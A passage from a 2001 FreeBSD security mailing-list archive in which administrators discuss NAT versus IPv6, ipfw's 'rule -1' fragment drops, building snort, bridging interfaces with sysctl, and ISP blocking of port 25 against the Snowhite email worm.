An ISP who won't give me at least one public address is just limiting where
I can apply their service. An ISP who gives me one or more public addresses
let's me pick the point at which I want to apply NAT.
So in spite of my flip remarks, I hope you can see that I do use NAT--I just
put it off to the last minute where it doesn't make business sense to avoid
it.
Bob
Ted Mittelstaedt wrote:
-----Original Message-----From:
owner-freebsd-questions@FreeBSD.ORG[mailto:owner-freebsd-questions@FreeBSD.O
RG]On Behalf Of Bob Van ValzahSent: Monday, March 12, 2001 8:07 AMTo: pWCc:
FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORGSubject: Re:
Racoon Problem & Cisco TunnelYes. The five DSL setups with which I'm
familiar all grant at least onepublic address per house. I believe all are
static, but one might bedynamic. Interference with protocols like IPSec is
one of the reasonswhy I'd make a public address a requirement when choising
a DSL!
provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at
allpossible. Let's hasten the deployment of IPv6.
I'd agree with you if everyone that would have to do a renumber of alarge
network from IPv4 to IPv6 had Vint Cerf's money. When your retiredlike him
with money coming out your arse-hole you can afford to makeirresponsible
statements like that.Unfortunately, what people like him don't understand is
that the burden ofrenumbering the fabric of the Internet from IPv4 to IPv6
will fall largelyon people like me - who have thousands of customers and
tens of thousands ofpublic IP numbers spread out among all of them - and who
don't have themoney to support something this audacious. I can almost
guarentee thatwhatever ISP that I am working for when this finally happens
is going to goout of business, all it's going to do is put thousands of
smaller tomedium-sized ISP's into bankruptcy and let people like AOL who
have moneycoming out their arse-holes virtually monopolize Internet access
in theworld.!
Until I see the large organizations with Class A's tied up, give up
thosenumbers back to the pool, I'll fight any attempt to move from IPv4 to
IPv6,and most other ISP's that are out there are going to fight it as well.
Inthe meantime I'm pushing all my customers into using NAT. NAT is here
tostay and people that run around calling it an aberration are just proving
tothe rest of us that they have absolutely no business sense.NAT has proven
itself reliable and vital and idiot engineers that design TCPprotocols that
assume everyone has a public IP number are just architectingtheir own
failures, and their protocol's subsequent minimizing by themarket. I have
some sympathy for protocols like IPSec that came to beduring the same time -
but organizational-to-organizational IPSec tunnelsdon't have to pass through
the NAT - they can terminate on it. But, anyonedoing a new protocol today
is a fool if it can't work though a NAT.!
Ted Mittelstaedt tedm@toybox.placo.comAuthor of:
The FreeBSD Corporate Networker's GuideBook website:
http://www.freebsd-corp-net-guide.com
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 23:20:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82])
by hub.freebsd.org (Postfix) with ESMTP id 07D6137B71B
for <security@freebsd.org>; Tue, 13 Mar 2001 23:20:17 -0800 (PST)
(envelope-from cjc@rfx-216-196-73-168.users.reflexcom.com)
Received: from rfx-216-196-73-168.users.reflexcom.com ([216.196.73.168]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19);
Tue, 13 Mar 2001 23:18:15 -0800
Received: (from cjc@localhost)
by rfx-216-196-73-168.users.reflexcom.com (8.11.1/8.11.1) id f2E7KFh11046;
Tue, 13 Mar 2001 23:20:15 -0800 (PST)
(envelope-from cjc)
Date: Tue, 13 Mar 2001 23:20:14 -0800
From: "Crist J. Clark" <cjclark@reflexnet.net>
To: Alan Batie <alan@batie.org>
Cc: security@FreeBSD.ORG
Subject: Re: ipfw rule -1?
Message-ID: <20010313232014.B496@cjc-desktop.users.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <20010313084020.A5859@agora.rdrop.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010313084020.A5859@agora.rdrop.com>; from alan@batie.org on Tue, Mar 13, 2001 at 08:40:20AM -0800
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote:
> I'm seeing a few of these in my ipfw log and was wondering what rule -1 is?
> I couldn't find anything about it in the man page...
>
> > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16
> > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
The manpage does not go as far as to indicate that this is rule -1,
but it does say this happens,
FINE POINTS
o There is one kind of packet that the firewall will always discard,
that is a TCP packet's fragment with a fragment offset of one. This
is a valid packet, but it only has one use, to try to circumvent
firewalls.
Rule -1 is given for any packet dropped, but not dropped due to a user
rule or the default rule. A quick look at the souce indicates the
above pseudo-rule and some other fragment issues (bogusfrag) are the
only such situations.
OK, I've answered this one enough times now. Should I send in a PR
with patch to the manpage or is this for the FAQ?
--
Crist J. Clark cjclark@alum.mit.edu
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 23:29:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from awww.jeah.net (awww.jeah.net [216.111.239.130])
by hub.freebsd.org (Postfix) with ESMTP id A330437B719
for <security@FreeBSD.ORG>; Tue, 13 Mar 2001 23:29:12 -0800 (PST)
(envelope-from chris@jeah.net)
Received: from localhost (chris@localhost)
by awww.jeah.net (8.11.1/8.11.0) with ESMTP id f2E7T0c08415;
Wed, 14 Mar 2001 01:29:00 -0600 (CST)
(envelope-from chris@jeah.net)
Date: Wed, 14 Mar 2001 01:28:59 -0600 (CST)
From: Chris Byrnes <chris@jeah.net>
To: <cjclark@alum.mit.edu>
Cc: Alan Batie <alan@batie.org>, <security@FreeBSD.ORG>
Subject: Re: ipfw rule -1?
In-Reply-To: <20010313232014.B496@cjc-desktop.users.reflexcom.com>
Message-ID: <Pine.BSF.4.33.0103140128330.8348-100000@awww.jeah.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I think it'd be nice to see it in the manpage right underneath the "Fine
Point" you pasted.
+ Chris Byrnes, chris@JEAH.net
+ JEAH Communications
+ 1-866-AWW-JEAH (Toll-Free)
On Tue, 13 Mar 2001, Crist J. Clark wrote:
> On Tue, Mar 13, 2001 at 08:40:20AM -0800, Alan Batie wrote:
> > I'm seeing a few of these in my ipfw log and was wondering what rule -1 is?
> > I couldn't find anything about it in the man page...
> >
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16
> > > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16
>
> The manpage does not go as far as to indicate that this is rule -1,
> but it does say this happens,
>
> FINE POINTS
> o There is one kind of packet that the firewall will always discard,
> that is a TCP packet's fragment with a fragment offset of one. This
> is a valid packet, but it only has one use, to try to circumvent
> firewalls.
>
> Rule -1 is given for any packet dropped, but not dropped due to a user
> rule or the default rule. A quick look at the souce indicates the
> above pseudo-rule and some other fragment issues (bogusfrag) are the
> only such situations.
>
> OK, I've answered this one enough times now. Should I send in a PR
> with patch to the manpage or is this for the FAQ?
> --
> Crist J. Clark cjclark@alum.mit.edu
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 23:32:27 2001
Delivered-To: freebsd-security@freebsd.org
Received: from castle.dreaming.org (castle.dreaming.org [216.221.214.170])
by hub.freebsd.org (Postfix) with ESMTP
id DDEB137B718; Tue, 13 Mar 2001 23:32:11 -0800 (PST)
(envelope-from mit@mitayai.net)
Received: (from root@localhost)
by castle.dreaming.org (8.11.2/8.11.2) id f2E7WBx78903;
Wed, 14 Mar 2001 02:32:11 -0500 (EST)
(envelope-from mit@mitayai.net)
Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199])
by castle.dreaming.org (8.11.2/8.11.2av) with SMTP id f2E7W9t78895;
Wed, 14 Mar 2001 02:32:09 -0500 (EST)
(envelope-from mit@mitayai.net)
From: "Will Mitayai Keeso Rowe" <mit@mitayai.net>
To: <freebsd-ports@freebsd.org>
Cc: <freebsd-security@freebsd.org>
Subject: RE: ICMP attacks
Date: Wed, 14 Mar 2001 02:29:17 -0500
Message-ID: <NEBBIEGPMLMKDBMMICFNAECNEMAA.mit@mitayai.net>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <980521178.3a7190da7ba07@mail.marketnews.com>
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400
Importance: Normal
X-Virus-Scanned: by AMaViS perl-10
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
i'd love to use snort, but i keep getting this:
[castle:root]/usr/ports/security/snort# make -DWITH_MYSQL=yes clean install
===> Cleaning for snort-1.7
===> Extracting for snort-1.7
>> Checksum OK for snort-1.7.tar.gz.
gzip: stdout: Broken pipe
===> Patching for snort-1.7
===> Configuring for snort-1.7
:-----Original Message-----
:From: owner-freebsd-security@FreeBSD.ORG
:[mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of
:mharding@marketnews.com
:Sent: January 26, 2001 10:00 AM
:To: Will Mitayai Keeso Rowe
:Cc: freebsd-security@FreeBSD.ORG
:Subject: Re: ICMP attacks
:
:
:Try using a Intrusion detection system. Snort works well for me.
:If this is
:just a port scan it will show a lot of different attack warnings as the
:different ports are hit, but it will show what IP is doing it.
:
:Mason
:
:Quoting Will Mitayai Keeso Rowe <mit@mitayai.net>:
:
:> > icmp-response bandwidth limit 205/200 pps
:> > icmp-response bandwidth limit 264/200 pps
:> > icmp-response bandwidth limit 269/200 pps
:> > icmp-response bandwidth limit 273/200 pps
:> > icmp-response bandwidth limit 273/200 pps
:> > icmp-response bandwidth limit 271/200 pps
:> > icmp-response bandwidth limit 261/200 pps
:> > icmp-response bandwidth limit 268/200 pps
:> > icmp-response bandwidth limit 205/200 pps
:> > icmp-response bandwidth limit 223/200 pps
:>
:> Is there any way to trace the people that are causing this? It's
:> becoming a
:> daily occurance and it's beginning to irritate me.
:>
:> -Mit
:>
:>
:>
:>
:>
:> To Unsubscribe: send mail to majordomo@FreeBSD.org
:> with "unsubscribe freebsd-security" in the body of the message
:>
:
:
:To Unsubscribe: send mail to majordomo@FreeBSD.org
:with "unsubscribe freebsd-security" in the body of the message
:
:
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Tue Mar 13 23:42: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from luke.macfat.dk (port3.ds1-taa.adsl.cybercity.dk [212.242.189.68])
by hub.freebsd.org (Postfix) with ESMTP id 0A59137B719
for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 23:41:53 -0800 (PST)
(envelope-from macfat@macfat.dk)
Received: by luke.macfat.dk (Postfix, from userid 1001)
id CDFED55416; Wed, 14 Mar 2001 08:41:51 +0100 (CET)
Date: Wed, 14 Mar 2001 08:41:51 +0100
From: Rene Pedersen <freebsd@macfat.dk>
To: Craig Chaney <cookfire@xmission.com>
Cc: freebsd-security@freebsd.org
Subject: Re: Bridging only 2 interfaces???
Message-ID: <20010314084151.A93208@luke.macfat.dk>
References: <001501c0ac43$49dcfe60$a3b746a6@cook>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <001501c0ac43$49dcfe60$a3b746a6@cook>; from cookfire@xmission.com on Tue, Mar 13, 2001 at 09:57:35PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Tue, Mar 13, 2001 at 09:57:35PM -0700, Craig Chaney wrote:
> I have set up a bridging firewall that has 3 interfaces. One of the
> interfaces is the protected side of the machine, one is the internet side of
> the machine, and the third is an interface in to my local network for
> management purposes. Is it possible to set up the machine to bridge just the
> interfaces not connected to the local network? If so how?
You should have a look at sysctl net.link.ether.bridge_cfg where you can define which interfaces that are bridged
eg: sysctl -w net.link.ether.bridge_cfg: fxp0:1,fxp1:1,fxp2:0,
which will bridge on fxp0 and fxp1 but not fxp2
// Rene
--
Micro$oft is not the answer, Micro$oft is the question, the answer is no.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 0:26: 0 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (f155.law7.hotmail.com [216.33.237.155])
by hub.freebsd.org (Postfix) with ESMTP id 02B8437B718
for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 00:25:57 -0800 (PST)
(envelope-from ntvsunix@hotmail.com)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
Wed, 14 Mar 2001 00:25:56 -0800
Received: from 209.53.55.186 by lw7fd.law7.hotmail.msn.com with HTTP; Wed, 14 Mar 2001 08:25:56 GMT
X-Originating-IP: [209.53.55.186]
From: "Some Person" <ntvsunix@hotmail.com>
To: cookfire@xmission.com, freebsd-security@freebsd.org
Subject: Re: Bridging only 2 interfaces???
Date: Wed, 14 Mar 2001 08:25:56
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F1550yA0FojonDUmeRX00008f27@hotmail.com>
X-OriginalArrivalTime: 14 Mar 2001 08:25:56.0750 (UTC) FILETIME=[646432E0:01C0AC60]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
I've never done that on FreeBSD (yet) and I do exactly that, with three NICs
on OpenBSD 2.8. I'm sure it's just as easily possible with FreeBSD using
IPFW...
IPF on OpenBSD would change the ruleset completely on the 'bridged'
interface/rules file.
It's a little tricky at first, but then very easy once you get the concept.
And not to forget that the (non-bridged) interface (if you decided to use
rules, is to use the normal rule processing and not the contrary for the
bridged interfaces).
Not trying to push you away from FreeBSD, just trying to help where I can...
Best Regards!
FreeBSD/OpenBSD - Advocate!
>
>I have set up a bridging firewall that has 3 interfaces. One of the
>interfaces is the protected side of the machine, one is the internet side
>of
>the machine, and the third is an interface in to my local network for
>management purposes. Is it possible to set up the machine to bridge just
>the
>interfaces not connected to the local network? If so how?
>
>Thank you
>
>--Craig
>
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 0:31:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (f113.law7.hotmail.com [216.33.237.113])
by hub.freebsd.org (Postfix) with ESMTP id 2299237B71B
for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 00:31:41 -0800 (PST)
(envelope-from ntvsunix@hotmail.com)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
Wed, 14 Mar 2001 00:31:41 -0800
Received: from 209.53.55.186 by lw7fd.law7.hotmail.msn.com with HTTP; Wed, 14 Mar 2001 08:31:40 GMT
X-Originating-IP: [209.53.55.186]
From: "Some Person" <ntvsunix@hotmail.com>
To: freebsd-security@freebsd.org
Subject: Re: Bridging only 2 interfaces???
Date: Wed, 14 Mar 2001 08:31:40
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F113LSAQV6uPDVniSnR0001b7d3@hotmail.com>
X-OriginalArrivalTime: 14 Mar 2001 08:31:41.0013 (UTC) FILETIME=[31969050:01C0AC61]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Speaking of that, is it still not possible to filter bridged frames on
FreeBSD with IPF?
Personally IPF is my prefered choice over IPFW, although of course IPFW does
have DUMMYNET.. :)
Dunno if that's been changed yet, or if there's any plans for it?
In the meanwhile, I've opted for OpenBSD and to be honest, I love it and
haven't seen any performance penalty at all...
I use FreeBSD for all other things too, but think would be kewl to have this
in FreeBSD as well...
Thanks.
>
>On Tue, Mar 13, 2001 at 09:57:35PM -0700, Craig Chaney wrote:
> > I have set up a bridging firewall that has 3 interfaces. One of the
> > interfaces is the protected side of the machine, one is the internet
>side of
> > the machine, and the third is an interface in to my local network for
> > management purposes. Is it possible to set up the machine to bridge just
>the
> > interfaces not connected to the local network? If so how?
>
>You should have a look at sysctl net.link.ether.bridge_cfg where you can
>define which interfaces that are bridged
>
>eg: sysctl -w net.link.ether.bridge_cfg: fxp0:1,fxp1:1,fxp2:0,
>which will bridge on fxp0 and fxp1 but not fxp2
>
>// Rene
>
>--
>Micro$oft is not the answer, Micro$oft is the question, the answer is no.
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 0:47:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from agora.rdrop.com (agora.rdrop.com [199.2.210.241])
by hub.freebsd.org (Postfix) with ESMTP id 4791837B718
for <security@FreeBSD.ORG>; Wed, 14 Mar 2001 00:47:35 -0800 (PST)
(envelope-from alan@agora.rdrop.com)
Received: (from alan@localhost)
by agora.rdrop.com (8.11.1/8.11.1) id f2E8mCg01662;
Wed, 14 Mar 2001 00:48:12 -0800 (PST)
Date: Wed, 14 Mar 2001 00:48:12 -0800
From: Alan Batie <alan@batie.org>
To: Chris Byrnes <chris@jeah.net>
Cc: cjclark@alum.mit.edu, security@FreeBSD.ORG
Subject: Re: ipfw rule -1?
Message-ID: <20010314004812.A1528@agora.rdrop.com>
Mail-Followup-To: Chris Byrnes <chris@jeah.net>,
cjclark@alum.mit.edu, security@FreeBSD.ORG
References: <20010313232014.B496@cjc-desktop.users.reflexcom.com> <Pine.BSF.4.33.0103140128330.8348-100000@awww.jeah.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <Pine.BSF.4.33.0103140128330.8348-100000@awww.jeah.net>; from chris@jeah.net on Wed, Mar 14, 2001 at 01:28:59AM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
On Wed, Mar 14, 2001 at 01:28:59AM -0600, Chris Byrnes wrote:
> I think it'd be nice to see it in the manpage right underneath the "Fine
> Point" you pasted.
I agree, as there's no indication from the ipfw log that it was that case
that triggered it.
--
Alan Batie ______ www.rdrop.com/users/alan Me
alan@batie.org \ / www.qrd.org The Triangle
PGPFP DE 3C 29 17 C0 49 7A \ / www.pgpi.com The Weird Numbers
27 40 A5 3C 37 4A DA 52 B9 \/ www.anti-spam.net NO SPAM!
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 5: 8:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231])
by hub.freebsd.org (Postfix) with ESMTP id 4979B37B71A
for <freebsd-security@freebsd.org>; Wed, 14 Mar 2001 05:08:19 -0800 (PST)
(envelope-from bmw@borderware.com)
From: "Bruce M. Walker" <bmw@borderware.com>
Message-Id: <200103141308.f2ED84E11909@fusion.borderware.com>
Subject: Re: Sophos and Virus return mail
In-Reply-To: <Pine.BSF.4.21.0103132338550.27904-100000@shazam.int> from Jim Durham
at "Mar 13, 2001 11:54:01 pm"
To: Jim Durham <durham@w2xo.pgh.pa.us>
Date: Wed, 14 Mar 2001 08:08:04 -0500 (EST)
Cc: freebsd-security@freebsd.org
X-Mailer: ELM [version 2.4ME+ PL66 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Jim Durham wrote:
>
> I thought of rewriting the script to use the "From: " address
> to reply. I think that would usually work, but I'm not sure
> that address always appears either.
Unhappily not:
From: Hahaha <hahaha@sexyfun.net>
You can see the IP of the host that sent it to you in the Received:
headers if you inspect them, but that will be simply the Windows
PC that itself has been infected. Snowhite contains a complete
SMTP send-only implementation and it delivers to its targets directly.
I'm afraid you're stuck with these things.
(This is one case where blocking of port 25 by ISPs is a good thing.)
-bmw
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 5:27:42 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
by hub.freebsd.org (Postfix) with ESMTP id 4C1E637B71A
for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 05:27:39 -0800 (PST)
(envelope-from rjh@mohawk.net)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id IAA06919;
Wed, 14 Mar 2001 08:42:23 -0500 (EST)
(envelope-from rjh@mohawk.net)
Date: Wed, 14 Mar 2001 08:42:23 -0500 (EST)
From: Ralph Huntington <rjh@mohawk.net>
To: "Bruce M. Walker" <bmw@borderware.com>
Cc: Jim Durham <durham@w2xo.pgh.pa.us>, freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <200103141308.f2ED84E11909@fusion.borderware.com>
Message-ID: <Pine.BSF.4.21.0103140841480.4793-100000@mohegan.mohawk.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> (This is one case where blocking of port 25 by ISPs is a good thing.)
If port 25 is blocked, then how is legitimate mail accepted? -=r=-
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 5:33:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231])
by hub.freebsd.org (Postfix) with ESMTP id 83D6537B719
for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 05:33:11 -0800 (PST)
(envelope-from bmw@borderware.com)
From: "Bruce M. Walker" <bmw@borderware.com>
Message-Id: <200103141333.f2EDX0J19096@fusion.borderware.com>
Subject: Re: Sophos and Virus return mail
In-Reply-To: <Pine.BSF.4.21.0103140841480.4793-100000@mohegan.mohawk.net> from
Ralph Huntington at "Mar 14, 2001 08:42:23 am"
To: Ralph Huntington <rjh@mohawk.net>
Date: Wed, 14 Mar 2001 08:33:00 -0500 (EST)
Cc: "Bruce M. Walker" <bmw@borderware.com>,
Jim Durham <durham@w2xo.pgh.pa.us>, freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL66 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Ralph Huntington wrote:
> > (This is one case where blocking of port 25 by ISPs is a good thing.)
>
> If port 25 is blocked, then how is legitimate mail accepted? -=r=-
[The instant I hit the "send" key, I knew I should have clarified! :-]
I meant, of course, blocking of port 25 to all destinations but the
"officially sanctioned mail server". ISPs generally provide you
with a mail server IP which you are supposed to forward all mail
to. Forcing all customers to go through that helps (a little) to
prevent spamming via open relays. Yes, it annoys some, but clients
with dynamic addresses on DSL/cable modems usually don't care.
(Veering dangerously OT now...)
-bmw
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 6:27:57 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
by hub.freebsd.org (Postfix) with ESMTP id 7EB7F37B718
for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 06:27:55 -0800 (PST)
(envelope-from rjh@mohawk.net)
Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21])
by mohegan.mohawk.net (8.9.3/8.9.3) with ESMTP id JAA08446;
Wed, 14 Mar 2001 09:42:54 -0500 (EST)
(envelope-from rjh@mohawk.net)
Date: Wed, 14 Mar 2001 09:42:54 -0500 (EST)
From: Ralph Huntington <rjh@mohawk.net>
To: "Bruce M. Walker" <bmw@borderware.com>
Cc: Jim Durham <durham@w2xo.pgh.pa.us>, freebsd-security@FreeBSD.ORG
Subject: Re: Sophos and Virus return mail
In-Reply-To: <200103141333.f2EDX0J19096@fusion.borderware.com>
Message-ID: <Pine.BSF.4.21.0103140939550.4793-100000@mohegan.mohawk.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
> > > (This is one case where blocking of port 25 by ISPs is a good thing.)
> >
> > If port 25 is blocked, then how is legitimate mail accepted? -=r=-
>
> I meant, of course, blocking of port 25 to all destinations but the
> "officially sanctioned mail server". ISPs generally provide you
> with a mail server IP which you are supposed to forward all mail
> to. Forcing all customers to go through that helps (a little) to
> prevent spamming via open relays. Yes, it annoys some, but clients
> with dynamic addresses on DSL/cable modems usually don't care.
Okay, so you meant blocking the 'escape' of packets bound for port 25 on
any machine *other*than* the approved smtp host, which, of course, does
not relay, correct?
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 6:59:34 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mgateway.borderware.com (mgateway.borderware.com [207.236.65.231])
by hub.freebsd.org (Postfix) with ESMTP id 1947037B71B
for <freebsd-security@FreeBSD.ORG>; Wed, 14 Mar 2001 06:59:30 -0800 (PST)
(envelope-from bmw@borderware.com)
From: "Bruce M. Walker" <bmw@borderware.com>
Message-Id: <200103141459.f2EExFI21502@fusion.borderware.com>
Subject: Re: Sophos and Virus return mail
In-Reply-To: <Pine.BSF.4.21.0103140939550.4793-100000@mohegan.mohawk.net> from
Ralph Huntington at "Mar 14, 2001 09:42:54 am"
To: Ralph Huntington <rjh@mohawk.net>
Date: Wed, 14 Mar 2001 09:59:15 -0500 (EST)
Cc: "Bruce M. Walker" <bmw@borderware.com>,
Jim Durham <durham@w2xo.pgh.pa.us>, freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL66 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
Ralph Huntington wrote:
> > > If port 25 is blocked, then how is legitimate mail accepted? -=r=-
> >
> > I meant, of course, blocking of port 25 to all destinations but the
> > "officially sanctioned mail server". ISPs generally provide you
> > with a mail server IP which you are supposed to forward all mail
> > to.
>
> Okay, so you meant blocking the 'escape' of packets bound for port 25 on
> any machine *other*than* the approved smtp host, which, of course, does
> not relay, correct?
Not *quite*: the approved SMTP mail server *must* be able to relay,
otherwise you (the customer) wouldn't be able to address mail to
anybody other than people with addresses at your ISP.
Maybe the context isn't clear: I'm referring to blocking being done
by your ISP (ie: your employer, your upstream provider, whatever).
This hypothetical ISP will filter packets destined for port 25 at
any IP-addr except for connections to, say, mail.big-isp.net, their
own mailserver.
Then they instruct you (the customer) that when you setup MS Lookout!
or Eudora, that you must specify mail.big-isp.net as the SMTP server.
Your mail client then forwards all outgoing mail to mail.big-isp.net,
and that server forwards your mail to the actual destination.
So mail.big-isp.net gets all the outgoing mail traffic from the
entire ISP's user community and forwards it to the addressees.
Nobody is allowed (in this gated community :-) to connect SMTP
directly from their Windoze box to the remote mailserver (or MX
host) of their addressee.
An example, I believe, is Mindspring who recently announced
that they would start blocking outgoing attempts to connect to
port 25. The point is to stop spammers in their user community
from abusing open relays.
Now, how did this go from "Snowhite and the Empty Envelope-from"
to "Packet-filtering by the Big Bad Wolf"? :-)
-bmw
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Wed Mar 14 8: 6: 2 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gndrsh.dnsmgr.net (GndRsh.dnsmgr.net [198.145.92.4])
by hub.freebsd.org (Postfix) with ESMTP id 9606637B718
for <security@FreeBSD.ORG>; Wed, 14 Mar 2001 08:05:58 -0800 (PST)
(envelope-from freebsd@gndrsh.dnsmgr.net)
Received: (from freebsd@localhost)
by gndrsh.dnsmgr.net (8.9.3/8.9.3) id IAA47316;
Wed, 14 Mar 2001 08:05:25 -0800 (PST)
(envelope-from freebsd)
From: "Rodney W. Grimes" <freebsd@gndrsh.dnsmgr.net>
